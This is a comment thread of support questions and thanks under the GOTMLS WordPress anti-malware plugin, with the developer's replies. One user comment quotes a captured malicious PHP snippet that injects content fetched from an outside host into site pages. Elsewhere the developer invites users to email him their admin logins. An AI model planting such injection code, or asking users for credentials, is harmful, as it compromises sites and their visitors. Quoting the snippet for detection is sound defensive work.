    • On December 22, 2015 at 8:48 am, Anti-Malware Admin said:

      Yes, each site will have it’s own Key but if you register those Keys using the same email address then they will all be under the same account.

      Reply
  • On December 11, 2015 at 1:58 am, xriz said:

    hi, i love the plugin and soon will donate. i just have 1 question, is it safe if i delete all files in quarantine? thanks

    Reply
    • On December 11, 2015 at 7:26 am, Anti-Malware Admin said:

      If your site is now clean and working fine then yes, it’s safe to delete the quarantine but it’s also safe to leave those records in the quarantine. Quarantine records are not a danger to your site and they can be helpful for investigating the source and method used to infect your site.

      Reply
  • On December 5, 2015 at 6:34 am, Foamy Media said:

    thanks so much for this plugin, it helped remove a back door script which my hosting company could not find!! awesome

    Reply
  • On December 2, 2015 at 11:22 am, Ruoall said:

    Hi,

    Love the plugin.

    Regarding the donation, if I donate, will I get the Bruteforce and BETA functions to all my sites that I have it installed on or do I have to donate per site?

    Reply
    • On December 2, 2015 at 1:33 pm, Anti-Malware Admin said:

      One donation per account, you can register multiple site under the same account by using the same email address on the registration form.

      Reply
  • On November 26, 2015 at 4:42 am, Kristine Allcroft said:

    Hey Eli!
    Thanks for creating this plugin.
    It’s better than Site Lock’s anti malware protection.
    I’m having a bit of a problem. When the scan reaches 93% it starts all over again at zero.
    What’s up?
    I’d like to get a complete scan and move on.

    Happy Thanksgiving!

    Reply
    • On November 26, 2015 at 8:47 am, Anti-Malware Admin said:

      It’s not actually starting over “at zero”, it’s just going back to “re-scan” some of the files that it failed to read on the first pass. If your server’s memory limit is too low then there may be a lot of files that it failed to scan in bulk, but it will re-scan them and then it will finish. There may then be a number of read/write errors listed in your results, those would be the files that failed the re-scan.

      The overall problem you are facing is entirely to do with your sub-par hosting. I would strongly suggest moving your site to a better host.

      Reply
  • On November 25, 2015 at 7:25 am, Duncan E said:

    Thanks for a great plugin. I’ve spent the last few weeks tracking an infection on our main webserver with no permanent success. But your plugin has nailed the little bugger once and for all. Well worth the donation!

    Reply
  • On November 18, 2015 at 7:15 am, Lois said:

    Hi Eli,

    Just wanted to say how much easier your plugin has made to my life & management of my sites! Malware was constantly being injected into my WP sites so much so that Blue Host shut 2 sites down twice. I’d no sooner get them cleaned and I’d be infected again. The amount of money I paid for cleaning and patching was astronomical. I am not a web builder or coder and clearly I was taken advantage of. I found your plugin through a search, installed on sites, (very easy) and now I run scans on my own, clean what comes and have saved myself a small fortune. I have recommended your plugin to dozens of colleagues and I thank you so much for making this available to techies and non-techies (me)!>

    Reply
  • On November 13, 2015 at 3:26 am, Bill Sierchio said:

    Updated from 4.15.42 to 4.15.44 – Now my scans have come to a crawl – used to be able to complete a full scan in about 30mins, now in 24hrs it only made it to 1% done.
    any suggestions?

    Reply
  • On November 1, 2015 at 8:53 am, Jennifer Rutherford said:

    i just wanted to drop a line and say how much i like your anti-malware. i run http://www.foogazoo.com, a very simple site that is just meant to make people smile.

    recently, i was attacked by malware, and after several days and trying other fixes, i came across your software. i found it easy to use and most importantly, entirely effective!

    so i wanted to let you know, i just donated the suggested $29. thank you eli!

    Reply
  • On October 28, 2015 at 3:31 am, Anil said:

    Hi

    https://wordpress.org/plugins/gotmls/ this shows missing seems plugin i deleted where i can download please give me link.

    Reply
    • On October 28, 2015 at 12:54 pm, Anti-Malware Admin said:

      Otto at WordPress complained about my plugin’s use of base64_decode. Even though it was totally legit (I use it to decode my definitions blob that stores an array of Threats) he suspended the plugin on wordpress.org saying that it was in violation of the WordPress Plugin Guidelines. I changed the PHP code into an array so it is “human readable” (not that it will make any more sense to most people than that Base64 blob did), but now I am just waiting for them to review the changes and restored the link to the WordPress Plugin Repository.

      For now you can download The new version of my plugin here:
      http://gotmls.net/gotmls.zip

      Reply
  • On October 19, 2015 at 12:03 am, Dan P said:

    HI Eli,

    does this plugin take server ressources when not scanning (at least not started by me)?

    Using your plugin on several installations on server and get /tmp space issues and Relic alerts all the time even when not running any of them. Is it better to deactivate them after a run?

    Thx a million

    Dan

    PS.: Couldn’t solve this RUM warning GOTMLS.NET gives me…is it possible that New Relic software (server monitoring by hosting company) makes GOTMLS.NET give me thge warning? I disabled every cache etc …? Thx again for your work & help

    Reply
    • On October 19, 2015 at 12:09 am, Dan P said:

      before I forget: THANK YOU SO MUCH FOR SUCH A GREAT HELPFUL TOOL… I tested several and yours is the best I have seen!

      Reply
    • On October 19, 2015 at 12:22 am, Anti-Malware Admin said:

      My plugin does not use up resource when you are not running a scan. If you have the Brute-Force Protection feature enabled then your server may white session information to the /tmp directory, that could be a problem it your tmp space is really limited.

      What “RUM warning” are you getting?

      Reply
      • On October 19, 2015 at 12:32 am, Dan P said:

        Hi Eli,

        thx for the fast response!!!

        yes, we have /tmp size issues… will look into the size thing

        THis is the warning I get everywhere:

        Another Plugin or Theme is using ‘New Relic auto-RUM’ to handle output buffers.
        This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
        Consider disabling caching and compression plugins (at least during the scanning process).

        any idea??

        Thx

        Dan

        Reply
        • On October 19, 2015 at 1:12 am, Anti-Malware Admin said:

          That warning is just to let you know about any code that has run ob_start with a custom output buffer handler. You should only be getting this message on the Anti-Malware pages in your wp-admin. If you are getting this on other pages then something is very wrong on your site. If you want me to take a look at it then you can send me you wp-admin login, but it is after 1am here so I will get some sleep first and check it out when I get up.

          Reply
  • On October 16, 2015 at 1:17 pm, Lorie Collins said:

    I have not yet used your plugin as we just came across it; my host provider actually installed this after an SEO malware infection was detected on the client’s site. I just have a question for you.

    It is my intention to begin using this plugin on all our client sites, and I have no issues with signing up each individual client/site, and encouraging them to donate to you. My question is, how does the plugin work with:

    A) multiple domains (domain.com; http://www.domain.com; http:// https://; parkeddomains.com)
    B) if we install the plugin on an under development site (dev.domain.com) and then move it to the live http://www.domain.com, do we need to create a new account when we launch the site? If we register the account on the http://www.domain.com but install it on the dev.domain.com, will it work or create conflicts of any kind?

    I need to know if this will allow a preemptive installation at the beginning of the development, or if it has to be the very last step after launch.

    C) How does it work with Ecommerce sites where part of the website is hosted elsewhere? Example I have a client who’s wordpress that I want to protect is on http://www.domain.com but one of her “pages” is on domain.bigcommerce.com. Will THAT create a conflict? Should we create an exclusion rule so the 2ndary offsite store doesn’t weird out your plugin and create false postives?

    D) What is the size of your installed plugin? We use Duplicator (Free version) for backups. Will this create an issue with the backups due to size (it doesn’t like files 3+ mbs)?

    E) Will caching plugins create any kind of a conflict? w3-total-cache; wp-super-cache; wp-fastest-cache

    Reply
    • On October 16, 2015 at 3:31 pm, Anti-Malware Admin said:

      A) It works fine with multiple domains/URLs, each domain must be registered with it’s own auto-generated key, but if you use the same email address then all the registered sites will be under the same account.
      B) Just register the plugin again with the same email whenever you change the URL and it will not loose anything and there will be no conflicts.
      C) My plugin will not effect, protect, block, conflict with, or otherwise interfere with any external site. It only scan the local file system on the server that your website resides on, and it only protects the WordPress site it is directly installed on.
      D) My plugin is only about 400KB in total.
      E) Caching plugins are a bit of “can-of-worms”… they tend to conflic with many other plugins in lots of inconsistent or unpredictable ways, and are generally not worth the trouble they can cause, IMHO. At the very least you should turn off caching and delete all cache files before running any kind of scan on your sites. Caching can interfere with the scanning process and also render inaccurate results. Cache files are temporary so there is not much point in scanning them but if they are scanned it can be tedious and time consuming for the scanning software and so it can dramatically increase the scan time.

      I hope that adequately answers all your questions. Feel free to contact me again if you have any more concerns.

      Reply
  • On October 10, 2015 at 8:23 am, Bill Bostic said:

    Awesome application. Nothing else is remotely close!

    Thank you!

    Reply
  • On October 9, 2015 at 9:49 am, Nerissa Drury said:

    Hi, I just found out through Google that my website has been hacked. Apparently URL injection. This is added onto the end of my website address /INVICTA/10051027708.html
    Can this software clean this kind of hacking?

    Thanks in advance!

    Reply
    • On October 9, 2015 at 10:34 am, Anti-Malware Admin said:

      It is hard to detect and differentiate HTML that advertises something you might want on your site from HTML that was put there maliciously that advertises something your don’t want on there. That said, my plugin will detect most PHP threats and vulnerabilities that would let a hacker put stuff like that on your site. It would be best if you delete that INVICTA folder if it was added maliciously and there is no important content in it, but it is also a good idea to run a Complete Scan of your whole site to look for the back-door scripts or other threats that may be exploitable so that that kind of content does not keep getting put on your site. If you have a chronic re-infection problem then you may want to look for a more secure hosting environment.

      I do also offer Super Secure Hosting for $12/month per site, if you want to more your site to a server that does not get hacked ;-)

      Reply
  • On October 7, 2015 at 5:03 am, Alicia said:

    When I try to update the definitions, I get the following error:
    unused

    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, webmaster@blog.nrcprograms.org and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    I made a donation under my initial email address and blog a few months ago, but we have since moved to a new sub-domain. I was able to update the definitions last month, so I don’t think that is the problem, but I guess it is still possible. Is there anything else that could be the problem?

    Thank you,
    Alicia

    Reply
    • On October 7, 2015 at 3:33 pm, Anti-Malware Admin said:

      Your host must be blocking the JavaScript Update. You should try the Automatic Update method, that seems to work fine on any server even if the manual update method fails.

      Let me know how that works for you.

      Reply
  • On September 18, 2015 at 8:49 am, Mike Blaney said:

    I have installed the plugin on two websites hosted at Bluehost. I have run the scan 20 times on each website over the past few days and every second time the back door script is back and often there are 3 core file changes. I fix them each time, fo to my ftp file manager and delete new directories, but the malware keeps coming back and trying to send emails. Any suggestions?

    Reply
    • On September 18, 2015 at 1:32 pm, Anti-Malware Admin said:

      You need to find out how these malicious scripts are getting planted on your server. The next time you get hit with these files you need to take a look at the timestamps on these files. There is the modified time, which might be help but can sometimes be forged, there is also a changed time which is surely going to indicate the exact time of the infection. This is the most important info you can get from these files and it needs to be examined and recorded before you make any kind of changes to these files. You can then look in the raw access_log files and cross reference infection times with any unusual activity to see what scripts were called at that exact time. This could indicate where your vulnerability is.

      Reply
  • On August 23, 2015 at 11:13 am, Luis Castro said:

    Hi, i have several domains on my account. Do i need to donate 29$ in each of them in order to access the full package?

    Reply
    • On August 24, 2015 at 7:58 pm, Anti-Malware Admin said:

      Nope, one donations will active the full features on all sites registered to that email address.

      Reply
      • On August 24, 2015 at 8:08 pm, noppadol L said:

        we need to install your plugin all our domain site if we have many domain? and if we have many subdomain.? Thanks.

        Reply
        • On August 31, 2015 at 6:39 am, Anti-Malware Admin said:

          Scanning the main site may scan the files of the other sites if they are nested inside the directory of the main site. However, the scan works best on a single site and the firewall and brute-force protection is only active on the sites you have the plugin installed on. Therefor, it would be best to install the plugin on each domain. If you have a Multisite installation then you can Network Activate a single copy of the plugin to protect all sites.

          Reply
  • On July 15, 2015 at 9:56 pm, Pharma Hygiene said:

    Don’t you agree it would be a good idea to update your wp to 4.2.2 for security reason?

    Reply
    • On August 4, 2015 at 9:24 am, Anti-Malware Admin said:

      If you are on 4.2 or 4.2.1 then you should definitely update to the newest version which is currently 4.2.4, but if you on a older version of WordPress then I don’t necessarily recommend upgrading to 4.2.X automatically. Call me old fashion but I personally like 3.7 and I have just update to the latest security release 3.7.10. I use the tried and true versions that have been around for a while and there are no known security vulnerabilities with 3.7.10 that I am aware of. Whereas, 4.2.X is still fairly new and they keep finding more bugs to fix which make is less stable and potentially less secure, IMHO.

      Reply
  • On July 12, 2015 at 6:32 am, Ray Rodriguez said:

    Quick question if I want to donate and use the plugin in multiple sites, so i need to donate for each site in order to get the extra benefits?

    Reply
    • On July 13, 2015 at 9:03 am, Anti-Malware Admin said:

      Currently your donations are applied to your account and all sites/keys registered to the email address associated with that account.

      Reply
  • On July 8, 2015 at 8:42 am, Larry Launstein Jr said:

    I recently paid the $29 donation to get the extra features of your program, and I have not gotten those updates yet. What do I have to do?

    Reply
    • On July 8, 2015 at 9:54 am, Anti-Malware Admin said:

      You need to enable the Automatic Update feature to get the Core Files definition update. Once you run the Complete Scan with the Automatic Updates enabled you will have the option to check for Core File Changes.

      Reply
  • On July 1, 2015 at 7:21 am, Ross Barbieri said:

    Just made a second donation. I gotta say man: you’re awesome – and gotmls is an excellent tool. I’m a developer, so if there is a way I can help you out let me know.

    Reply
  • On June 27, 2015 at 2:51 pm, Dennis Albert said:

    I am the admin for this website and I cannot log into the back end of my website. The message I keep getting is You have been redirected here from http://www.greenwichneighborsunited.com which is protected against brute-force attacks by GOTMLS.NET & then the #5199346.
    I have refreshed my browser, cleaned all cookines & cache, still cannot get in!
    Please help me to be able to get back into my own website!
    Thanks,
    Dennis

    Reply
    • On June 27, 2015 at 6:27 pm, Anti-Malware Admin said:

      #5199346 is a NO_SESSION error. So your browser in not maintaining a persistent session. I just tested you login page from my browser and I was not redirected so it is not a problem with your server or my plugin. You should check the security settings on your browser to make sure sessions are enabled or try a different browser.

      Reply
  • On June 24, 2015 at 10:17 pm, Mehedi Hasan said:

    thanks

    Reply
  • On June 11, 2015 at 11:50 am, Yogesh said:

    Hey,

    if i donate, then for how many sites can i use that key?

    Reply
    • On June 11, 2015 at 5:54 pm, Anti-Malware Admin said:

      Each site is registered to it’s own key. You can register as many keys/sites as you want using the same email address so that they are all under the same account that you donated with.

      Reply
  • On May 28, 2015 at 12:52 am, Pat Ward said:

    Every time I click on “check for definition updates” I get this message

    “No response from server!” why am I getting this message?

    Reply
    • On May 28, 2015 at 10:45 am, Anti-Malware Admin said:

      There must be something blocking you from checking my server for updates. Check the error console in your browser to see if it will tell you why the update server is blocked. You may need to change the security settings in your browser or try another browser.

      Reply
  • On May 27, 2015 at 10:51 am, Daniel said:

    Hi Eli,
    On scanning my website the result is 1 known threat, and it highlights the code lines as in the image attached https://dl.dropboxusercontent.com/u/3546925/Threat.jpg . Could you please have a look and tell me if this is indeed a threat as I want to inform the plugin creator to fix but I don’t know how to explain to him ? Thank you.

    Reply
    • On May 27, 2015 at 11:37 am, Anti-Malware Admin said:

      Thanks for send this info to me. This is actually a false positive. I found the reason for this file being incorrectly identified as a Known Threat and I have released new Definition Update that resolves this issue. Please download the new Definition Update and this file will no longer be flagged as a Known Threat. Thanks again for bringing this to my attention.

      Reply
  • On May 17, 2015 at 12:23 pm, Toby Drysdale said:

    Love the plugin and have been happy to donate.

    However, I appear to have a problem on a few sites that I’ve installed the plugin on. The full scan starts the process OK but sticks at 0%. I’ve tried running the quick scan and that fails too at between 30% and 54%. Memory is set to 512Mb on all sites. The websites are spread over 2 different servers and a few of the sites scan without a problem. Really stumped as to how to proceed further – I’ve retried the scans and left for several hours – any help/tips would be greatly appreciated :)

    WordPress: 4.2.2
    Plugin: 4.15.21
    Definitions: F5B9Q

    Reply
    • On May 17, 2015 at 2:46 pm, Anti-Malware Admin said:

      Thanks for reporting this bug. I found that the WP function current_user_can() cannot be called from the admin_init or admin_menu hooks in some versions of WordPress without causing a Fatal error in /wp-includes/capabilities.php. This is because it calls wp_get_current_user() which is found in /wp-includes/pluggable.php but not always included at this point.

      This looks like a major bug in WP and I am not yet sure what versions are affected but I will be submitting a bug report to the WP Core team shortly. For now I have release a patch for this issue in version 4.15.22 that include the needed pluggable.php file before calling current_user_can.

      Please upgrade to version 4.15.22 and confirm that that fixes the issue for you.

      Reply
  • On May 16, 2015 at 4:42 am, Rahul Sharma said:

    Hello,
    I have just installed your plugin and it is scanning website….however I hosted my wordpress websites on ipage they have send me a list of 1500 + Malware and ask me to fix or remove it in 48 hours from there servers and I have around 20 + websites so will it work for all the website?
    I am worried or else I have to buy another shared hosting who will allow me to host my websites ??? This ipage company is forcing me to buy sitelock which is of no use..I have read so many reviews in the past one week,,,,about sitelock …I have read a lot about your plugin and I am hopefull……

    Reply
    • On May 16, 2015 at 7:45 am, Anti-Malware Admin said:

      You should be able to clean all your sites with my plugin. I understand they have given you a very tight deadline. If all your sites are structured as sub-directories under one main site then you could scan then all at once from the main site.

      Reply
  • On May 10, 2015 at 12:57 pm, Mztar Lharrywizzy said:

    Thanks To You My site Is Normal

    Reply
  • On May 5, 2015 at 7:45 am, Daniel said:

    Hi Eli,
    I have a subfolder in the /wp-content/uploads named quarantine and an index.php inside that has a base64 line. Is this normal, is it something your plugin installed? That base64 coding looks strange to me. Can you pls have a look? Thank you https://dl.dropboxusercontent.com/u/3546925/quarantine.zip

    Reply
    • On May 6, 2015 at 10:29 am, Anti-Malware Admin said:

      Yes, That file is ok. It was written like that so that the HTML content could not be modified by hackers but I can see that it might cause more confusion than it’s worth to use base64 encoded output if people may jump to the conclusion that it is malicious code. I will alter the encoding of that file in my next release so that it is more human-readable.

      Reply
  • On April 28, 2015 at 8:31 pm, Pav said:

    Hello,

    I was wondering if it is possible to register multiple websites with one email address/key? I am a developer and I have a few websites under my wing.
    Do you have any developer license options or anything similar?

    Awesome product by the way – works like a charm.

    Reply
    • On April 28, 2015 at 8:46 pm, Anti-Malware Admin said:

      Thanks!

      Each site generates it’s own key, but you can register all your site under the same email address.

      Then you can make one larger donation and it will count for all of them ;-)

      Reply
      • On April 29, 2015 at 6:37 pm, Pavan Ratra said:

        Awesome, thanks mate. Also, how do I go about upgrading to get access to the Core Files scanner?

        Reply
        • On April 29, 2015 at 6:45 pm, Anti-Malware Admin said:

          If you donate at the $29+ level then you can use the automatic update feature to install the Core Files integrity check, that will also dramatically speed up the scan of the wp-include and wp-admin folders.

          Reply
  • On April 28, 2015 at 1:20 pm, Marcio said:

    too good to be true, uh? LOL

    Reply
  • On April 27, 2015 at 6:20 am, dj said:

    Hello – i tried to run a quick scan today and it keeps stopping at 32%. My definitions are updated. I processed a wordpress scan then a plugins scan just prior and both worked.

    I would appreciate any assistance you would provide.

    Thank you.

    Reply
    • On April 27, 2015 at 7:42 am, Anti-Malware Admin said:

      Your server does not allocate enough memory for PHP to scan all your files in a single process. Unfortunately this is very common on shared hosting that is designed to limit your consumption of shared resources. That is why it is recommended that you run the Complete Scan, this will take longer because it splits up the scan job into smaller pieces but it should be able to finish the scan at 100%.

      Reply
  • On April 21, 2015 at 7:01 am, Ian Miller said:

    Hi I just upgraded to the latest version and when I try to run the scan all I get is a

    … Loading, Please Wait … and nothing happens..
    It worked on the older versions . I host multiple site on the system and this is the first I’ve seen it.

    Reply
  • On March 26, 2015 at 9:46 am, Bruno Accioly said:

    Your plugin is simply amazing!

    You should take a look at this.
    It is spreading fast!
    http://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html

    Reply
    • On March 26, 2015 at 10:46 am, Anti-Malware Admin said:

      Thank you. I have seen many variations of this Darkleech Infection and my plugin already looks for and removes malicious code like that.

      Reply
  • On February 26, 2015 at 6:50 am, Dan Stevens said:

    Hi

    I have loads of “potential threats” that I can see are actual threats.

    How do i clean these? There doesn’t seem to be an option to do so.

    I have donated to the plugin

    thanks

    Dan

    Reply
    • On February 26, 2015 at 8:00 am, Anti-Malware Admin said:

      Potential Threats are usually no malicious, but it sounds like you found some that definitely are. If you can send me the infected files I will add those to the list of Known Threats. Then you can download the new definition update and my plugin will fix them for you.

      Alternatively, if you send me your WP Admin login I will have a look at them in-place and add the definition update for you.

      Reply
      • On March 17, 2015 at 10:28 am, lila said:

        I am having the same issue, could you help me please? I can send you my log in info. i love the plug in congratulations

        Reply
        • On March 18, 2015 at 11:48 am, Anti-Malware Admin said:

          As I told Dan, you can send me the infected files I will add those to the list of Known Threats. Then you can download the new definition update and my plugin will fix them for you, or you can send me your WP Admin login I will have a look at them in-place and add the definition update for you.

          Reply
  • On February 9, 2015 at 7:38 pm, Mark said:

    its a great plugin! just a question, does it only find and remove the virus or prevent also from future attacks?

    Happy user!
    Mark

    Reply
    • On February 9, 2015 at 7:58 pm, Anti-Malware Admin said:

      My plugin can also protect your site from some of the most common attacks and I am always working to improve the protection as new threats emerge.

      Reply
  • On February 6, 2015 at 10:44 am, Will Zell said:

    Suddenly several of my websites that are using the Malware plugin are redirecting to a error page. Example:
    1046673
    You have been redirected here from a site that is protected against brute-force attacks by GOTMLS.NET

    Reply
    • On February 6, 2015 at 1:35 pm, Anti-Malware Admin said:

      There was a major bug in version 4.14.56, I have just released a fix for this issue in version 4.14.58. Please download the new release ASAP and let me know if that fixes it for you.

      Reply
      • On February 7, 2015 at 7:59 pm, Brock Ellis said:

        Thanks so much for staying on top of this, Eli! Your work has saved me many countless hours. I try to donate every time I realize how much you’ve saved my buttocks. =) Thanks again!

        Reply
  • On January 27, 2015 at 3:47 am, Przemyslaw Jarocki said:

    Thank you very much! Your plugin rescued my website and saved me a lot of time by not having to use the backup to restore it. I did few other scans from some ‘pro’ antivirus plugins, but nothing seemed to work, and they ask for a lot of money to go premium with no guarantee that it’s going to solve the problem… With your plugin it’s different, I could test it first. Thank you so much! It was a pleasure to send my donation too.

    Reply
  • On January 4, 2015 at 5:17 pm, John Giovannis said:

    Hi Eli,

    Great plugin ! Very easy to install and the report is easy to interpret. It also found a number of potential threats where other similar plugins weren’t able to detect.

    I was wondering if there a command line version that runs in a bash session ?

    If so, one could create a script which runs periodically and emails the administrator if a problem has been detected.

    All the best …

    Joh

    Reply
    • On January 5, 2015 at 12:29 am, Anti-Malware Admin said:

      Were these potential threats malicious? If so, I would like to take a look at them so I can add them to the Known Threats. If not you can whitelist them.

      There is no command line version but I am working on a scheduling agent as part of my external scan option that will be coming out this year :-)

      Reply
      • On January 5, 2015 at 3:01 pm, John Giovannis said:

        Hi Eli,

        I don’t know for sure if the threats are malicious. I’ll be happy to send you the files so you can have a look.

        I’ve also performed a “diff” between these files and corresponding files from a fresh installation. It’s not obvious which files might be malicious

        Can I send you these files offline directly to your email address ?

        Thanks for checking it out.

        John

        Reply
        • On January 5, 2015 at 3:06 pm, Anti-Malware Admin said:

          Yes, you can send them directly to My email address.

          Reply
          • On February 18, 2015 at 4:19 pm, Parmpatialvis said:

            Sir, i have scanned the websites and got 5 malwares but there is not any option to remove these malwares please tell me what i need to do

          • On February 18, 2015 at 4:36 pm, Anti-Malware Admin said:

            If there is no option to Fix those 5 files then they are probably only Potential Threats not known malware. Only Know Threats and Back-doors in Red can be automatically fixed with my plugin. Potential Threats are probably not malicious anyway.

  • On December 30, 2014 at 10:05 am, Arturo said:

    Hi!

    I tried to download the plugin but it was impossible, apparently this remove to wordpress.org, did something happen?

    Thanks!

    Reply
    • On December 30, 2014 at 7:59 pm, Anti-Malware Admin said:

      Yes, WordPress suspended it today because it was checking my server for updates even if you have not registered (this was against the requirements of the WordPress Repository Guidelines).

      I just released a new version that does not check my servers for updates unless you have registered. They have reviewed my new version and re-listed my plugin. You should be able to download it now.

      Please let me know if you still have a problem with it.

      Reply
  • On December 25, 2014 at 2:22 am, Konrad said:

    Hello,

    I’m trying to scan my page but the only thing that is happening is “Loading, please wait” and nothing more (for few hours). I tried with 2 pages and changed firefox to chrome (cleaned history, temaporaty files). What might be the problem? Plugin is registered and definitions are updated. Thanks for any help! Merry Christmas :)

    Reply
    • On December 25, 2014 at 4:55 pm, Anti-Malware Admin said:

      Did you also try the Quick Scan?

      Chack the Error Console or Page Inspector in your browser to see if there are any JavaScript Errors when you run the scan. This could be preventing the results from being displayed.

      If you want me to troubleshoot this issue you can send your login info directly to my email: eli AT gotmls DOT net

      Mele kalikimaka!

      Reply
  • On December 24, 2014 at 12:37 pm, D. Montgomery said:

    You sir are my hero!

    Your software removed the many compromised scripts that infected my websites. Thank you for being excellent. Sincerely! I am installing this on all of my WP sites from now on.

    Bravo! I wish you the best! Thank you for all you do!
    -Dave

    Reply
  • On December 23, 2014 at 2:41 am, James said:

    Hi, I’ve installed this on a couple of websites I take care of, the one site ran the plugin and updated definitions/registered fine but the other two say “Could not find server!” all of them are hosted on hostgator. Thanks

    Reply
    • On December 23, 2014 at 2:57 am, Anti-Malware Admin said:

      The Definition Updates are checked via JavaScript so if there is another script on your admin page that is causing a JavaScript error it could cause other scripts on that page to fail. See if the Script debugger or inspector in your browser tells you there is a error on the page. Let me know what you find, or if you want to email me your WP Admin login then I’ll check it out myself.

      Reply
      • On December 30, 2014 at 7:00 am, Denise Witt said:

        I am having this same issue, I updated some sites and it updated the definitions/registered just fine and then some of them are saying “Could not find server” and all of them are hosted on HostGator on a dedicated server. Very frustrated and couldn’t find a javascript error that would fix it.

        Reply
        • On December 30, 2014 at 8:00 pm, Anti-Malware Admin said:

          I have fixed this issue in the new version I just released, 4.14.54, please update and let me know if you still have any issues.

          Reply
  • On December 18, 2014 at 1:36 am, Petrescu Cezar said:

    Thank you! You saved my work. Donated aswel.

    Reply
  • On December 6, 2014 at 3:04 am, Jack said:

    Hi, i want to test your plugin as all php files have code added at top, does it solve the problem mentioned here

    http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html

    Reply
    • On December 6, 2014 at 3:10 am, Anti-Malware Admin said:

      My plugin should fix the malware issue you have. Please go ahead and test it and let me know how it goes.

      Reply
  • On September 11, 2014 at 6:29 pm, Helen said:

    Hi guys. i have a site that when i look in google has thousands of pages attached to the domain so looks like mydomainname.com/playstation-wont-game-updates-a6c56 and when i click on the link it goes to my site but to the home page and says content not found

    I ran the software but it says nothing wrong and has identified some files that all look legit?? in the Potential Threats

    * NOTE: These are probably not malicious scripts (but it’s a good place to start looking IF your site is infected and no Known Threats were found).
    They are to do with plugins etc

    My question is how do i fix this and get these links out of the google seach engine please

    Reply
    • On September 12, 2014 at 8:14 am, Anti-Malware Admin said:

      If you have registered my plugin and downloaded the latest Definition Update then I wouldn’t worry about those Potential Threats. I am working on a new release that will make it easier to whitelist those legit plugins that use suspicious code. As long there are no more Known Threat (in red) then your site is probalby clean.

      Google must have indexed your site when it was infected with malware and added links to all those fake pages. The fact that those pages don’t come up on your site any more is further evidence that your site is now clean. To get these links off of Google’s search results you’ll need a Google Webmaster Tools account (signup now if you don’t already have an account). You can submit a Sitemap under “Crawl” the tell Google what pages you wouldlike to be indexed. You can also Remove URLs under “Google Index” so that those 404 links get dropped from the search results.

      Please let me know if you need any further assistance.

      Reply
  • On September 7, 2014 at 2:16 am, Lamb Farm said:

    Hi Eli.

    After what seems like years (but only days) of trying to recover from malicious malware and SEO spam, I discovered your plugin which ‘seems’ to have fixed most of my websites.
    Except one. When I run the full scan and attempt to fix some errors, it tells me that it could fix x number but not the rest. Then I run again and it fixes more. I have several thousand lines to fix so this might take me many weeks at this rate.

    Am I doing something wrong?

    BTW, I’m SO impressed with your plugin so far on the other sites, it was like magic!
    Lamb

    Reply
    • On September 7, 2014 at 8:13 am, Anti-Malware Admin said:

      I just had another user with the same problem. They had over four thousand infected file but couldonly clean about 100 at a time. This is due to a PHP memory limit on your server. My plugin will fix them all in one pass if it can but if the process runs out of memory then it will stop and report however many it was able to fix on that pass. Then you just have to click the fix button again and it will keep on going through your list of Know Threats where it left off on the last attemp. It took a couple hours to get through a few thousand infected files on this other server but there really isn’t another way to do it. The only thing that might speed things up is if you can increase the memory limit in your PHP config.

      Reply
      • On September 7, 2014 at 6:19 pm, Lamb Farm said:

        Thank you Eli.

        Even after I tried to fix the errors, it hangs for a long time and I get this error:

        Request Entity Too Large
        The requested resource
        /wp-admin/admin.php
        does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.

        So after a day of scanning, not sure how i’m going to be able to run and fix in segments after all. Any suggestions?

        Thanks
        Lamb

        Reply
        • On September 7, 2014 at 7:01 pm, Anti-Malware Admin said:

          It sounds like there are lots of limits in your php.ini file that are way too low. You can try increasing the POST sizi limit. You might even consider switching hosting to a better server. How many sites do you have?

          If you want to stick it out the key is to fix a few at a time. If you start the Complete Scan over you should click the fix button when ever new threats are found. You can click and clean as it scans or you can pause and clean and then resume, but the key is to click the fix button often enough that it does not get overwhelmed. How long does a Complete Scan take to finish? If you keep fixing as the scan goes on then you should be all done when the scan is done.

          Let me know if you need more help. You can also send me your WP Admin login if you want me to take a look at it personnally.

          Reply
  • On August 12, 2014 at 5:16 pm, Jake said:

    I didn’t see an area to report malicious scripts, but you might consider including spamcheckr.com as a malicious term to scan for. I found your plugin while trying to resolve this issue:

    http://stackoverflow.com/questions/22923521/wordpress-blog-infected-with-html-refresh-meta-tag

    This ended up being the malicious code:

    if (mt_rand(0,99) == 1) {
    function sec_check() {
    if(function_exists(‘curl_init’))
    {
    $url = “spamcheckr.com/req.php”;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    }
    add_action(‘wp_head’,'sec_check’);

    Reply
    • On August 13, 2014 at 12:29 pm, Anti-Malware Admin said:

      Thanks for reporting this new variant. I have added it to my latest Definition Update so that it can be automatically removed in future scans.

      You should download the latest Definition Update and run a Complete Scan to see if it is found anywhere else on your site.

      Please let me know if I can be of any further help or if you find any more malicious code on your site that I should look at.

      Reply
  • On August 3, 2014 at 10:29 am, omar masrur said:

    Hi Eli
    I have a wordpress website. Google reported i have malware, indicated the wordpress page and the infecting links. The links are:

    http://cdn1.clkmon.com/script/rhpop_1.0.23.js
    http://clkmon.com/adServe/banners?tid=J1J2J3_15614_0&tagid=2&_=1407065858845

    Funnily enough, Google webmaster does not indicate a problem though.

    I just downloaded and ran GOTMLS on WP-content and did not find a threat. The 17 potential threats do not have the page google mentioned.

    Any thoughts on how to proceed next? My google ads are not running now for 4 days and its killing my small business!!!!

    tks

    Reply
    • On August 3, 2014 at 10:42 am, Anti-Malware Admin said:

      Make sure you have registered my plugin so you can download the latest Definition Updates. Then run the Complete Scan on the whole site (not just the wp-content) and fix any Known Threats that it finds.

      It is still does not find anything please let me know.

      Reply
  • On August 2, 2014 at 12:48 am, Guido Osterwald said:

    Superb plugin and fine piece of works, which helpedc me to get my site clean again, after some more or less minor or major attacks!
    Just a quest … i donated (of course!!!) … but having done that, your plugin tells me i hadnt …. could you please check and tell me?

    Reply
    • On August 2, 2014 at 1:31 am, Anti-Malware Admin said:

      Thank you, I see your donation, it just didn’t get associated with your Registration Key. I have corrected this so that you donation should now be reflected in your WP Admin.

      Reply
